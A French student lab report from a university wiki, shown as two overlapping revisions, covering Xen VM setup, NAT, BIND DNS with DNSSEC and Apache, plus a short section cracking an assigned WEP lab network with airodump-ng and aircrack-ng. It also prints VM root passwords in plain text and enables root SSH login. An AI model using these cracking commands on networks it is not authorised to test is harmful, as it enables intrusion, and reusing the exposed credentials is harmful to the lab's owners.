SSH Fingerprint : SHA256:FbqBOG+0bBjuQBOlAytAlbMV/9VoJ8BAlFadG/VaGD4 (ED25519)<br />
SSH Fingerprint : SHA256:FCEtQGUhMhN9DDtTmt5zts/9PeC7ahnmJA7UOhMnGeg (RSA)<br />
Root Password : ekrmCSKb3ZAxXSYvNpjbiSK<br />
</syntaxhighlight><br />
<br />
==== Etape 4 : ====<br />
PHRASE MANQUANTE<syntaxhighlight lang="shell"><br />
xen create /etc/xen/SE4.Manjaro.cfg<br />
xen create /etc/xen/SE4.CachyOS.cfg<br />
xen create /etc/xen/SE4.LinusTorvalds.cfg<br />
</syntaxhighlight>On vérifie la liste des machines lancées via : <syntaxhighlight lang="shell"><br />
xen list<br />
</syntaxhighlight><br />
<br />
===== Nos résultats : =====<br />
<syntaxhighlight lang="shell"><br />
Name ID Mem VCPUs State Time(s)<br />
SE4.CachyOS 83 2048 1 -b---- 5.6<br />
SE4.Manjaro 85 2048 1 -b---- 5.8<br />
SE4.LinusTorvalds 87 2048 1 -b---- 5.3<br />
</syntaxhighlight><br />
<br />
==== Etape 5 : Partition ====<br />
<br />
===== Sur capbreton =====<br />
<br />
On partionne avec cette commande :<syntaxhighlight lang="shell"><br />
lvcreate -n SE4.CachyOS.var -L 10G virtual<br />
</syntaxhighlight><br />
On éteint notre machine : <syntaxhighlight lang="shell"><br />
xen shutdown SE4.CachyOS<br />
</syntaxhighlight><br />
Et on modifie :<syntaxhighlight lang="shell"><br />
vim /etc/xen/SE4.CachyOS.cfg<br />
</syntaxhighlight><br />
<br />
Et on ajoute ceci :<syntaxhighlight lang="shell"><br />
disk = [<br />
[...],<br />
'phy:/dev/virtual/SE4.CachyOS.home,xvda3,w',<br />
'phy:/dev/virtual/SE4.CachyOS.var,xvdb1,w'<br />
]<br />
</syntaxhighlight><br />
<br />
===== Sur la machine mandataire =====<br />
<br />
Nous ajoutons les partitions dans '''''/etc/fstab''''' : <syntaxhighlight lang="shell"><br />
/dev/xvda3 /var ext4 defaults 0 2<br />
/dev/xvdb1 /home ext4 defaults 0 2<br />
</syntaxhighlight><br />
<br />
Nous formatons les partitions avant de les utiliser : <syntaxhighlight lang="shell"><br />
mkfs -t ext4 /dev/xvda3<br />
mkfs -t ext4 /dev/xvdb1<br />
</syntaxhighlight><br />
<br />
Nous copions le contenu de '''/var''' : <syntaxhighlight lang="shell"><br />
mount /dev/xvda3 /mnt<br />
mv /var/* /mnt<br />
umount /mnt<br />
</syntaxhighlight><br />
<br />
Nous montons ensuite automatiquement les partitions définies dans '''/etc/fstab''' : <syntaxhighlight lang="shell"><br />
mount -a<br />
</syntaxhighlight><br />
<br />
===== De nouveaux sur capbreton =====<br />
On redémarre notre machine : <syntaxhighlight lang="shell"><br />
xen create /etc/xen/SE4.CachyOS.cfg<br />
</syntaxhighlight><br />
<br />
Ensuite on se connecte à notre VM via :<syntaxhighlight lang="shell"><br />
xen console SE4.CachyOS<br />
</syntaxhighlight><br />
<br />
===== Machines de Service - CachyOS & Manjaro =====<br />
Dans notre VM :<br />
<br />
On modifie :<syntaxhighlight lang="shell"><br />
vim /etc/network/interfaces<br />
</syntaxhighlight><br />
Et on ajoute ceci :<syntaxhighlight lang="shell"><br />
auto lo<br />
iface lo inet loopback<br />
<br />
auto eth0<br />
iface eth0 inet static<br />
address 192.168.10.3/24<br />
gateway 192.168.10.1<br />
<br />
# Pour l'ipv6<br />
auto eth1<br />
iface eth1 inet6 auto<br />
<br />
</syntaxhighlight><br />
<br />
* 172.60.0.3 est l'adresse IPV4 de la VM CachyOS<br />
<br />
===== Machine Mandataire - LinusTorvalds =====<br />
La machine mandataire agit comme passerelle IPv4 pour les machines de services. Voici sa configuration réseau :<br />
<br />
La machine mandataire va posséder trois adresses. Une adresse IPv6 routée, une adresse IPv4 routée et une adresse IPv4 pour le réseau privé avec ces deux machines de services. Pour ce faire, nous devons au préalable configurer une nouvelle interface eth1 pour y intégrer la seconde adresse IPv4.<br />
<br />
Sur capbreton, depuis <code>/etc/xen/SE4.CachyOS.cfg :</code><syntaxhighlight lang="shell"><br />
vif = [[...], 'mac=00:16:3E:8B:45:ED,bridge=SE4']<br />
</syntaxhighlight>Pour l'adresse mac on prend celui existant et on fait +1.<br />
<br />
Depuis <code>/etc/resolv.conf </code>:<syntaxhighlight lang="shell"><br />
nameserver 8.8.8.8<br />
<br />
</syntaxhighlight><br />
<br />
==== SSH 476 ssh -oKexAlgorithms=+diffie-hellman-group14-sha1 -oHostKeyAlgorithms=+ssh-rsa -oCiphers=+aes128-cbc admin@172.27.0.3 ====<br />
<syntaxhighlight lang="shell"><br />
apt update<br />
apt upgrade<br />
<br />
apt install ssh<br />
apt install bind9<br />
apt install apache2<br />
</syntaxhighlight>(Dans TOUTES les VMs)<br />
<br />
On active le SSH en ajoutant dans <code>/etc/ssh/sshd_config</code> :<syntaxhighlight lang="shell"><br />
PermitRootLogin yes<br />
</syntaxhighlight>Pour redemarrer le service ssh :<syntaxhighlight lang="shell"><br />
/etc/init.d/ssh restart<br />
</syntaxhighlight>Pour la machine mandataire, ensuite après avoir reboot on peut faire dans nos machines de services :<syntaxhighlight lang="shell"><br />
iptables -t nat -A POSTROUTING -j MASQUERADE -s 192.168.10.0/24<br />
</syntaxhighlight> <br />
<br />
==== Mascarade ====<br />
Sur la mandataire : <syntaxhighlight lang="shell"><br />
iptables -t nat -A PREROUTING -p tcp --dport 2202 -j DNAT --to-destination 192.168.10.3:22<br />
iptables-save<br />
<br />
</syntaxhighlight>Et on décommente cette ligne dans <code>/etc/sysctl.conf</code> : <syntaxhighlight lang="shell"><br />
net.ipv4.ip_forward=1<br />
</syntaxhighlight>Et maintenant nous pouvons nous connecter à notre machine de service en ssh : <syntaxhighlight lang="shell"><br />
#IPV4<br />
ssh root@193.48.57.166 -p 2202<br />
# IPV6<br />
ssh root@2001:660:4401:60a0:216:3eff:fe8b:45ed<br />
</syntaxhighlight><br />
<br />
==== DNS ====<br />
Tout d'abord, il faut modifier <code>/etc/bind/named.conf.local</code> : <syntaxhighlight lang="shell"><br />
zone "archlinuxbtw.lol" {<br />
type master;<br />
file "/etc/bind/myZones/db.archlinuxbtw.lol";<br />
allow-transfer{secondaries;};<br />
notify yes;<br />
};<br />
<br />
acl "secondaries"{<br />
192.168.10.2;<br />
2001:660:4401:60a0:216:3eff:fe36:79d9;<br />
};<br />
<br />
zone "archlinux.lol" {<br />
type secondary;<br />
file "/etc/bind/backup/db.archlinux.lol";<br />
primaries{2001:660:4401:60a0:216:3eff:fe36:79d9;};<br />
};<br />
<br />
</syntaxhighlight>J'ai ensuite créée un dossier myZones puis j'ai créer db.archlinuxbtw.lol et j'y ai ajouter :<syntaxhighlight lang="shell"><br />
$TTL 400<br />
<br />
@ IN SOA ns.archlinuxbtw.lol admin.archlinuxbtw.lol (<br />
3609 ; Numero de version<br />
21600 ; Rafraichissement (6h)<br />
3600 ; Re-tentative (1h)<br />
2592000 ; Expiration (30j)<br />
86400 ; Cache negatif (24h)<br />
);<br />
<br />
IN NS ns.archlinuxbtw.lol.<br />
IN NS ns.archlinux.lol.<br />
@ IN A 193.48.57.166<br />
@ IN AAAA 2001:660:4401:60a0:216:3eff:fe8b:45ed<br />
ns IN A 193.48.57.166<br />
ns IN AAAA 2001:660:4401:60a0:216:3eff:fe8b:45ed<br />
<br />
www IN CNAME archlinuxbtw.lol<br />
<br />
</syntaxhighlight>Ensuite on restart le service via : <code>service named restart</code><br />
<br />
<br />
Création d'une clé<syntaxhighlight lang="shell"><br />
openssl req -nodes -newkey rsa:2048 -sha256 -keyout archlinuxbtw.lol.key -out archlinuxbtw.csr<br />
</syntaxhighlight><br />
[[Fichier:DNS Check.png|centré|vignette|452x452px|DNS Checker ]]<br />
Notre DNS est bien reconnu et la commande <code>dig @8.8.8.8 archlinuxbtw.lol</code> c'est grâce au Glue records.<br />
<br />
<br />
Génération des clés<br />
<br />
<br />
Changement nom machine <code>nano /etc/hostname : CachyOS</code><br />
<br />
Et dans /etc/hosts:<br />
<br />
127.0.1.1 archlinuxbtw.lol SE4.CachyOS<br />
<br />
==== DNSSEC ====<br />
Afin de protéger notre DNS contre des possibles attaques nous utiliserons DNSSEC. Ici nous utiliserons la politique DNSSEC : <code>"dnspol"</code><br />
Ensuite on crée le dossier keys et on donne les droits a bind d'écrire dedans avec :<syntaxhighlight lang="shell"><br />
mkdir /etc/bind/keys <br />
chown bind:bind /etc/bind/keys <br />
chmod 750 /etc/bind/keys<br />
</syntaxhighlight>Pour ce faire, dans <code>named.conf.local</code> il faut rajouter les 3 lignes à partir de "key-directory" :<syntaxhighlight lang="shell"><br />
key-directory "/etc/bind/keys";<br />
dnssec-policy "dnspol"; // DNSSEC automatique<br />
inline-signing yes;<br />
<br />
[...]<br />
<br />
dnssec-policy "dnspol" {<br />
keys {<br />
ksk key-directory lifetime unlimited algorithm 13;<br />
zsk key-directory lifetime unlimited algorithm 13;<br />
};<br />
nsec3param;<br />
};<br />
<br />
</syntaxhighlight>Pour l'activer, il faut restart bind9 avec <code>systemctl restart bind9</code><br />
<br />
Il ne reste qu'à ajouter la clé KSK sur Gandi et ensite on peut voir s'il fonctionne bien grace au site suivant : <nowiki>https://dnsviz.net</nowiki><br />
[[Fichier:DNSSec.png|centré|vignette|DNSSec]]<br />
<br />
<br />
Et on peut voir que nos clefs on bien été générer : <syntaxhighlight lang="shell"><br />
root@CachyOS:/etc/bind# ls keys/<br />
Karchlinuxbtw.lol.+013+24458.key Karchlinuxbtw.lol.+013+56682.key<br />
Karchlinuxbtw.lol.+013+24458.private Karchlinuxbtw.lol.+013+56682.private<br />
Karchlinuxbtw.lol.+013+24458.state Karchlinuxbtw.lol.+013+56682.state<br />
<br />
</syntaxhighlight><br />
<br />
==== Apache ====<br />
Dans ce repertoire <code>/etc/apache2/sites-availab</code>le : touch archlinuxbtw.lol.conf <br />
<br />
<br />
Je genere un crt via la commande : <br />
<br />
openssl x509 -req -days 365 -in archlinuxbtw.csr -signkey archlinuxb<br />
<br />
tw.lol.key -out archlinuxbtw.lol.crt<br />
<br />
<br />
Et je deplace mes fichiers dans : <br />
<br />
root@CachyOS:~# mv archlinuxbtw.lol.crt /etc/ssl/certs/ <br />
<br />
root@CachyOS:~# mv archlinuxbtw.lol.key /etc/ssl/private/ <br />
<br />
root@CachyOS:~# chmod 600 /etc/ssl/private/archlinuxbtw.lol.key<br />
<br />
Pour arreter le service par defaut : a2dissite 000-default.conf <br />
<br />
Et on verifie avec la commande : apache2ctl -S<br />
<br />
Iptable pour atteindres les ports https : <code># HTTP iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT --to-destination 192.168.10.3:80 # HTTPS iptables -t nat -A PREROUTING -p tcp --dport 443 -j DNAT --to-destination 192.168.10.3:443 iptables-save</code><br />
<br />
<br />
iptables -A FORWARD -p tcp -d 192.168.10.3 --dport 80 -j ACCEPT<br />
<br />
iptables -A FORWARD -p tcp -d 192.168.10.3 --dport 443 -j ACCEPT<br />
<br />
<br />
<br />
ssh -oKexAlgorithms=+diffie-hellman-group14-sha1 -oHostKeyAlgorithms=+ssh-rsa -oCiphers=+aes128-cbc admin@172.27.0.3<br />
<br />
==== Effraction WiFi ====<br />
Il faut tout faire sur la zabeth13 comme on avait tester sur 4 machines dans la semaine avec mon binome les cartes réseaux des autres machines ne marchent pas. <br />
<br />
Avec ip link je vois que l'interface wifi se nomme wlan1.<br />
<br />
On peut alors recuperer le bssid de notre réseau wifi a crack. Je suis le numéro 5 donc je dois crack la cracotte05 : <br />
<br />
sudo airodump-ng wlan1<br />
<br />
Je recupere :<br />
<br />
<code>BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID</code><br />
<br />
<code>04:DA:D2:9C:50:54 -63 27 5 0 4 54e. WEP WEP cracotte05</code> <br />
<br />
Je peux alors dump correctement en filtrant seulement le bon bssid et le bon channel via cette commande : <br />
<br />
<code>sudo airodump-ng wlan1 --bssid 04:DA:D2:9C:50:54 -c4 --write log_airodump</code><br />
<br />
<br />
Et ensuite après avir récuperer 5000 data :<br />
<br />
<code>sudo aircrack-ng -b 04:DA:D2:9C:50:54 log_airodump-01.cap</code><br />
<br />
=== Utiles ===<br />
<br />
=== XEN ===<br />
''<u>Liste des VMs allumées :</u>'' <syntaxhighlight lang="shell"><br />
xen list<br />
</syntaxhighlight><br />
<br />
''<u>Se connecter à la VM :</u>''<syntaxhighlight lang="shell"><br />
xen console <nomMachine><br />
</syntaxhighlight>nomMachine : dans notre cas soit SE4.Manjaro | SE4.CachyOS | SE4.LinusTorvalds<br />
''<u>Sortir de la console xen :</u>''<syntaxhighlight lang="shell"><br />
Ctrl + Shift + 5<br />
</syntaxhighlight>''<u>Eteindre une VM :</u>'' <syntaxhighlight lang="shell"><br />
xen shutdown <nomMachine><br />
</syntaxhighlight>nomMachine : dans notre cas soit SE4.Manjaro | SE4.CachyOS | SE4.LinusTorvalds<br />
<br />
''<u>Allumer une VM :</u>''<syntaxhighlight lang="shell"><br />
xen create /etc/xen/<nomMachine>.cfg<br />
</syntaxhighlight></div>
Cpayet
https://wiki-se.plil.fr/mediawiki/index.php?title=Atelier_SysRes_SE4_2025/2026_E5&diff=12136
Atelier SysRes SE4 2025/2026 E5
2026-02-10T13:41:41Z
<p>Cpayet : /* Compte rendu des commandes effectués */</p>
<hr />
<div>=== Compte rendu des commandes effectués ===<br />
<br />
==== Etape 1 : Connexion SSH ====<br />
ssh root@capbreton<br />
<br />
Mot de passe : <br />
<br />
==== Etape 2 : Créer un fichier dans le répertoire /etc/network/interfaces.d du Dom0 aux noms du binôme concerné ====<br />
On se déplace à ce répertoire :<syntaxhighlight lang="shell"><br />
cd /etc/network/interfaces.d/<br />
</syntaxhighlight>On créer ensuite ensuite un fichier aux noms de notre binôme et on l'édite :<syntaxhighlight lang="shell"><br />
touch SE42026_cpayet_tdelobel<br />
vim SE42026_cpayet_tdelobel<br />
<br />
</syntaxhighlight>Puis on donne un nom au bridge, ici c'est `pont_pacman`et on met dans le fichier ceci :<syntaxhighlight lang="shell"><br />
auto pont_pacman<br />
iface pont_pacman inet manual<br />
bridge_ports none<br />
up ip link set $IFACE up<br />
down ip link set $IFACE down<br />
</syntaxhighlight>Une fois le pont créer, il faut le démarrer :<syntaxhighlight lang="shell"><br />
ifup pont_pacman<br />
</syntaxhighlight><br />
<br />
==== Etape 3 : Création des VMs ====<br />
<syntaxhighlight lang="shell"><br />
xen-create-image --hostname=SE4.CachyOS --dhcp --bridge=pont_pacman --dir=/usr/local/xen --size=10G --dist=daedalus --memory=2048M --force<br />
xen-create-image --hostname=SE4.Manjaro --dhcp --bridge=pont_pacman --dir=/usr/local/xen --size=10G --dist=daedalus --memory=2048M --force<br />
xen-create-image --hostname=SE4.LinusTorvalds --dhcp --bridge=pont_pacman --dir=/usr/local/xen --size=10G --dist=daedalus --memory=2048M --force<br />
</syntaxhighlight>On adapte les hostnames en fonction des nom de nos machines. <br />
<br />
'''''IMPORTANT :''''' Les résultats des commandes sont à noter car ellles contiennent les mots de passe et autres informations importantes.<br />
<br />
===== Nos résultats : =====<br />
CachyOS : <syntaxhighlight lang="shell"><br />
Installation Summary<br />
---------------------<br />
Hostname : SE4.CachyOS<br />
Distribution : daedalus<br />
MAC Address : 00:16:3E:8B:45:EC<br />
IP Address(es) : dynamic<br />
SSH Fingerprint : SHA256:p+nECGSXOPvFjDjk+/x8adAn8JxTTPjuknCTcFZxJNk (DSA)<br />
SSH Fingerprint : SHA256:YaNMhK5ZFF/TshemMHSmt08R9uBPAnhNK134XEZ0CuY (ECDSA)<br />
SSH Fingerprint : SHA256:qQNuBNfAoySUPOFPplDh8p0ZPtxRulz/vbOq+Pm4gwM (ED25519)<br />
SSH Fingerprint : SHA256:psWV2TNuHsZcRelqipM7TJ/mE4cvFI+oxndg6nvCpCk (RSA)<br />
Root Password : 6nyCiterydiMtnxsPDRsUys<br />
<br />
</syntaxhighlight>Manjaro : <syntaxhighlight lang="shell"><br />
<br />
Installation Summary<br />
---------------------<br />
Hostname : SE4.Manjaro<br />
Distribution : daedalus<br />
MAC Address : 00:16:3E:36:79:D8<br />
IP Address(es) : dynamic<br />
SSH Fingerprint : SHA256:n+ojtWyKBODRtEppjCvAp6nd2cjL/Ily54j0cM03lMc (DSA)<br />
SSH Fingerprint : SHA256:K+Qa9NAU3JIGsMy3LEYCgFbfL3ozuiRKG+U3XsbV5ow (ECDSA)<br />
SSH Fingerprint : SHA256:AJLfxk4Zz8BZflWYOS8mifapH+uAFgGKA3WSj6rN0NA (ED25519)<br />
SSH Fingerprint : SHA256:/6iWOWoii0nJsbScwVYIGQAbuTI1/YIpaRyRdBl8mwE (RSA)<br />
Root Password : PgvMbhYvgtksg8tmiJnVZnQ<br />
</syntaxhighlight>LinusTorvalds :<syntaxhighlight lang="shell"><br />
Installation Summary<br />
---------------------<br />
Hostname : SE4.LinusTorvalds<br />
Distribution : daedalus<br />
MAC Address : 00:16:3E:AA:BF:EF<br />
IP Address(es) : dynamic<br />
SSH Fingerprint : SHA256:ouY/2dce0YI/mJD9Qw68oKU0xdw6Cs9ybgJxRm/FKiI (DSA)<br />
SSH Fingerprint : SHA256:p5lZznE0q8j6c68YTF5toYgBugOkc0IopTO+Ce9SiZ8 (ECDSA)<br />
SSH Fingerprint : SHA256:FbqBOG+0bBjuQBOlAytAlbMV/9VoJ8BAlFadG/VaGD4 (ED25519)<br />
SSH Fingerprint : SHA256:FCEtQGUhMhN9DDtTmt5zts/9PeC7ahnmJA7UOhMnGeg (RSA)<br />
Root Password : ekrmCSKb3ZAxXSYvNpjbiSK<br />
</syntaxhighlight><br />
<br />
==== Etape 4 : ====<br />
PHRASE MANQUANTE<syntaxhighlight lang="shell"><br />
xen create /etc/xen/SE4.Manjaro.cfg<br />
xen create /etc/xen/SE4.CachyOS.cfg<br />
xen create /etc/xen/SE4.LinusTorvalds.cfg<br />
</syntaxhighlight>On vérifie la liste des machines lancées via : <syntaxhighlight lang="shell"><br />
xen list<br />
</syntaxhighlight><br />
<br />
===== Nos résultats : =====<br />
<syntaxhighlight lang="shell"><br />
Name ID Mem VCPUs State Time(s)<br />
SE4.CachyOS 83 2048 1 -b---- 5.6<br />
SE4.Manjaro 85 2048 1 -b---- 5.8<br />
SE4.LinusTorvalds 87 2048 1 -b---- 5.3<br />
</syntaxhighlight><br />
<br />
==== Etape 5 : Partition ====<br />
<br />
===== Sur capbreton =====<br />
<br />
On partionne avec cette commande :<syntaxhighlight lang="shell"><br />
lvcreate -n SE4.CachyOS.var -L 10G virtual<br />
</syntaxhighlight><br />
On éteint notre machine : <syntaxhighlight lang="shell"><br />
xen shutdown SE4.CachyOS<br />
</syntaxhighlight><br />
Et on modifie :<syntaxhighlight lang="shell"><br />
vim /etc/xen/SE4.CachyOS.cfg<br />
</syntaxhighlight><br />
<br />
Et on ajoute ceci :<syntaxhighlight lang="shell"><br />
disk = [<br />
[...],<br />
'phy:/dev/virtual/SE4.CachyOS.home,xvda3,w',<br />
'phy:/dev/virtual/SE4.CachyOS.var,xvdb1,w'<br />
]<br />
</syntaxhighlight><br />
<br />
===== Sur la machine mandataire =====<br />
<br />
Nous ajoutons les partitions dans '''''/etc/fstab''''' : <syntaxhighlight lang="shell"><br />
/dev/xvda3 /var ext4 defaults 0 2<br />
/dev/xvdb1 /home ext4 defaults 0 2<br />
</syntaxhighlight><br />
<br />
Nous formatons les partitions avant de les utiliser : <syntaxhighlight lang="shell"><br />
mkfs -t ext4 /dev/xvda3<br />
mkfs -t ext4 /dev/xvdb1<br />
</syntaxhighlight><br />
<br />
Nous copions le contenu de '''/var''' : <syntaxhighlight lang="shell"><br />
mount /dev/xvda3 /mnt<br />
mv /var/* /mnt<br />
umount /mnt<br />
</syntaxhighlight><br />
<br />
Nous montons ensuite automatiquement les partitions définies dans '''/etc/fstab''' : <syntaxhighlight lang="shell"><br />
mount -a<br />
</syntaxhighlight><br />
<br />
===== De nouveaux sur capbreton =====<br />
On redémarre notre machine : <syntaxhighlight lang="shell"><br />
xen create /etc/xen/SE4.CachyOS.cfg<br />
</syntaxhighlight><br />
<br />
Ensuite on se connecte à notre VM via :<syntaxhighlight lang="shell"><br />
xen console SE4.CachyOS<br />
</syntaxhighlight><br />
<br />
===== Machines de Service - CachyOS & Manjaro =====<br />
Dans notre VM :<br />
<br />
On modifie :<syntaxhighlight lang="shell"><br />
vim /etc/network/interfaces<br />
</syntaxhighlight><br />
Et on ajoute ceci :<syntaxhighlight lang="shell"><br />
auto lo<br />
iface lo inet loopback<br />
<br />
auto eth0<br />
iface eth0 inet static<br />
address 192.168.10.3/24<br />
gateway 192.168.10.1<br />
<br />
# Pour l'ipv6<br />
auto eth1<br />
iface eth1 inet6 auto<br />
<br />
</syntaxhighlight><br />
<br />
* 172.60.0.3 est l'adresse IPV4 de la VM CachyOS<br />
<br />
===== Machine Mandataire - LinusTorvalds =====<br />
La machine mandataire agit comme passerelle IPv4 pour les machines de services. Voici sa configuration réseau :<br />
<br />
La machine mandataire va posséder trois adresses. Une adresse IPv6 routée, une adresse IPv4 routée et une adresse IPv4 pour le réseau privé avec ces deux machines de services. Pour ce faire, nous devons au préalable configurer une nouvelle interface eth1 pour y intégrer la seconde adresse IPv4.<br />
<br />
Sur capbreton, depuis <code>/etc/xen/SE4.CachyOS.cfg :</code><syntaxhighlight lang="shell"><br />
vif = [[...], 'mac=00:16:3E:8B:45:ED,bridge=SE4']<br />
</syntaxhighlight>Pour l'adresse mac on prend celui existant et on fait +1.<br />
<br />
Depuis <code>/etc/resolv.conf </code>:<syntaxhighlight lang="shell"><br />
nameserver 8.8.8.8<br />
<br />
</syntaxhighlight><br />
<br />
==== SSH 476 ssh -oKexAlgorithms=+diffie-hellman-group14-sha1 -oHostKeyAlgorithms=+ssh-rsa -oCiphers=+aes128-cbc admin@172.27.0.3 ====<br />
<syntaxhighlight lang="shell"><br />
apt update<br />
apt upgrade<br />
<br />
apt install ssh<br />
apt install bind9<br />
apt install apache2<br />
</syntaxhighlight>(Dans TOUTES les VMs)<br />
<br />
On active le SSH en ajoutant dans <code>/etc/ssh/sshd_config</code> :<syntaxhighlight lang="shell"><br />
PermitRootLogin yes<br />
</syntaxhighlight>Pour redemarrer le service ssh :<syntaxhighlight lang="shell"><br />
/etc/init.d/ssh restart<br />
</syntaxhighlight>Pour la machine mandataire, ensuite après avoir reboot on peut faire dans nos machines de services :<syntaxhighlight lang="shell"><br />
iptables -t nat -A POSTROUTING -j MASQUERADE -s 192.168.10.0/24<br />
</syntaxhighlight> <br />
<br />
==== Mascarade ====<br />
Sur la mandataire : <syntaxhighlight lang="shell"><br />
iptables -t nat -A PREROUTING -p tcp --dport 2202 -j DNAT --to-destination 192.168.10.3:22<br />
iptables-save<br />
<br />
</syntaxhighlight>Et on décommente cette ligne dans <code>/etc/sysctl.conf</code> : <syntaxhighlight lang="shell"><br />
net.ipv4.ip_forward=1<br />
</syntaxhighlight>Et maintenant nous pouvons nous connecter à notre machine de service en ssh : <syntaxhighlight lang="shell"><br />
#IPV4<br />
ssh root@193.48.57.166 -p 2202<br />
# IPV6<br />
ssh root@2001:660:4401:60a0:216:3eff:fe8b:45ed<br />
</syntaxhighlight><br />
<br />
==== DNS ====<br />
Tout d'abord, il faut modifier <code>/etc/bind/named.conf.local</code> : <syntaxhighlight lang="shell"><br />
zone "archlinuxbtw.lol" {<br />
type master;<br />
file "/etc/bind/myZones/db.archlinuxbtw.lol";<br />
allow-transfer{secondaries;};<br />
notify yes;<br />
};<br />
<br />
acl "secondaries"{<br />
192.168.10.2;<br />
2001:660:4401:60a0:216:3eff:fe36:79d9;<br />
};<br />
<br />
zone "archlinux.lol" {<br />
type secondary;<br />
file "/etc/bind/backup/db.archlinux.lol";<br />
primaries{2001:660:4401:60a0:216:3eff:fe36:79d9;};<br />
};<br />
<br />
</syntaxhighlight>J'ai ensuite créée un dossier myZones puis j'ai créer db.archlinuxbtw.lol et j'y ai ajouter :<syntaxhighlight lang="shell"><br />
$TTL 400<br />
<br />
@ IN SOA ns.archlinuxbtw.lol admin.archlinuxbtw.lol (<br />
3609 ; Numero de version<br />
21600 ; Rafraichissement (6h)<br />
3600 ; Re-tentative (1h)<br />
2592000 ; Expiration (30j)<br />
86400 ; Cache negatif (24h)<br />
);<br />
<br />
IN NS ns.archlinuxbtw.lol.<br />
IN NS ns.archlinux.lol.<br />
@ IN A 193.48.57.166<br />
@ IN AAAA 2001:660:4401:60a0:216:3eff:fe8b:45ed<br />
ns IN A 193.48.57.166<br />
ns IN AAAA 2001:660:4401:60a0:216:3eff:fe8b:45ed<br />
<br />
www IN CNAME archlinuxbtw.lol<br />
<br />
</syntaxhighlight>Ensuite on restart le service via : <code>service named restart</code><br />
<br />
<br />
Création d'une clé<syntaxhighlight lang="shell"><br />
openssl req -nodes -newkey rsa:2048 -sha256 -keyout archlinuxbtw.lol.key -out archlinuxbtw.csr<br />
</syntaxhighlight><br />
[[Fichier:DNS Check.png|centré|vignette|452x452px|DNS Checker ]]<br />
Notre DNS est bien reconnu et la commande <code>dig @8.8.8.8 archlinuxbtw.lol</code> c'est grâce au Glue records.<br />
<br />
<br />
Génération des clés<br />
<br />
<br />
Changement nom machine <code>nano /etc/hostname : CachyOS</code><br />
<br />
Et dans /etc/hosts:<br />
<br />
127.0.1.1 archlinuxbtw.lol SE4.CachyOS<br />
<br />
==== DNSSEC ====<br />
Afin de protéger notre DNS contre des possibles attaques nous utiliserons DNSSEC. Ici nous utiliserons la politique DNSSEC : <code>"dnspol"</code><br />
Ensuite on crée le dossier keys et on donne les droits a bind d'écrire dedans avec :<syntaxhighlight lang="shell"><br />
mkdir /etc/bind/keys <br />
chown bind:bind /etc/bind/keys <br />
chmod 750 /etc/bind/keys<br />
</syntaxhighlight>Pour ce faire, dans <code>named.conf.local</code> il faut rajouter les 3 lignes à partir de "key-directory" :<syntaxhighlight lang="shell"><br />
key-directory "/etc/bind/keys";<br />
dnssec-policy "dnspol"; // DNSSEC automatique<br />
inline-signing yes;<br />
<br />
[...]<br />
<br />
dnssec-policy "dnspol" {<br />
keys {<br />
ksk key-directory lifetime unlimited algorithm 13;<br />
zsk key-directory lifetime unlimited algorithm 13;<br />
};<br />
nsec3param;<br />
};<br />
<br />
</syntaxhighlight>Pour l'activer, il faut restart bind9 avec <code>systemctl restart bind9</code><br />
<br />
Il ne reste qu'à ajouter la clé KSK sur Gandi et ensite on peut voir s'il fonctionne bien grace au site suivant : <nowiki>https://dnsviz.net</nowiki><br />
[[Fichier:DNSSec.png|centré|vignette|DNSSec]]<br />
<br />
<br />
Et on peut voir que nos clefs on bien été générer : <syntaxhighlight lang="shell"><br />
root@CachyOS:/etc/bind# ls keys/<br />
Karchlinuxbtw.lol.+013+24458.key Karchlinuxbtw.lol.+013+56682.key<br />
Karchlinuxbtw.lol.+013+24458.private Karchlinuxbtw.lol.+013+56682.private<br />
Karchlinuxbtw.lol.+013+24458.state Karchlinuxbtw.lol.+013+56682.state<br />
<br />
</syntaxhighlight><br />
<br />
==== Apache ====<br />
Dans ce repertoire <code>/etc/apache2/sites-availab</code>le : touch archlinuxbtw.lol.conf <br />
<br />
<br />
Je genere un crt via la commande : <br />
<br />
openssl x509 -req -days 365 -in archlinuxbtw.csr -signkey archlinuxb<br />
<br />
tw.lol.key -out archlinuxbtw.lol.crt<br />
<br />
<br />
Et je deplace mes fichiers dans : <br />
<br />
root@CachyOS:~# mv archlinuxbtw.lol.crt /etc/ssl/certs/ <br />
<br />
root@CachyOS:~# mv archlinuxbtw.lol.key /etc/ssl/private/ <br />
<br />
root@CachyOS:~# chmod 600 /etc/ssl/private/archlinuxbtw.lol.key<br />
<br />
Pour arreter le service par defaut : a2dissite 000-default.conf <br />
<br />
Et on verifie avec la commande : apache2ctl -S<br />
<br />
Iptable pour atteindres les ports https : <code># HTTP iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT --to-destination 192.168.10.3:80 # HTTPS iptables -t nat -A PREROUTING -p tcp --dport 443 -j DNAT --to-destination 192.168.10.3:443 iptables-save</code><br />
<br />
<br />
iptables -A FORWARD -p tcp -d 192.168.10.3 --dport 80 -j ACCEPT<br />
<br />
iptables -A FORWARD -p tcp -d 192.168.10.3 --dport 443 -j ACCEPT<br />
<br />
<br />
<br />
ssh -oKexAlgorithms=+diffie-hellman-group14-sha1 -oHostKeyAlgorithms=+ssh-rsa -oCiphers=+aes128-cbc admin@172.27.0.3<br />
<br />
==== Effraction WiFi ====<br />
Avec ip link je vois que l'interface wifi se nomme wlan1.<br />
<br />
On peut alors recuperer le bssid de notre réseau wifi a crack. Je suis le numéro 5 donc je dois crack la cracotte05 : <br />
<br />
sudo airodump-ng wlan1<br />
<br />
Je recupere :<br />
<br />
<code>BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID</code><br />
<br />
<code>04:DA:D2:9C:50:54 -63 27 5 0 4 54e. WEP WEP cracotte05</code> <br />
<br />
Je peux alors dump correctement en filtrant seulement le bon bssid et le bon channel via cette commande : <br />
<br />
<code>sudo airodump-ng wlan1 --bssid 04:DA:D2:9C:50:54 -c4 --write log_airodump</code><br />
<br />
=== Utiles ===<br />
<br />
=== XEN ===<br />
''<u>Liste des VMs allumées :</u>'' <syntaxhighlight lang="shell"><br />
xen list<br />
</syntaxhighlight><br />
<br />
''<u>Se connecter à la VM :</u>''<syntaxhighlight lang="shell"><br />
xen console <nomMachine><br />
</syntaxhighlight>nomMachine : dans notre cas soit SE4.Manjaro | SE4.CachyOS | SE4.LinusTorvalds<br />
''<u>Sortir de la console xen :</u>''<syntaxhighlight lang="shell"><br />
Ctrl + Shift + 5<br />
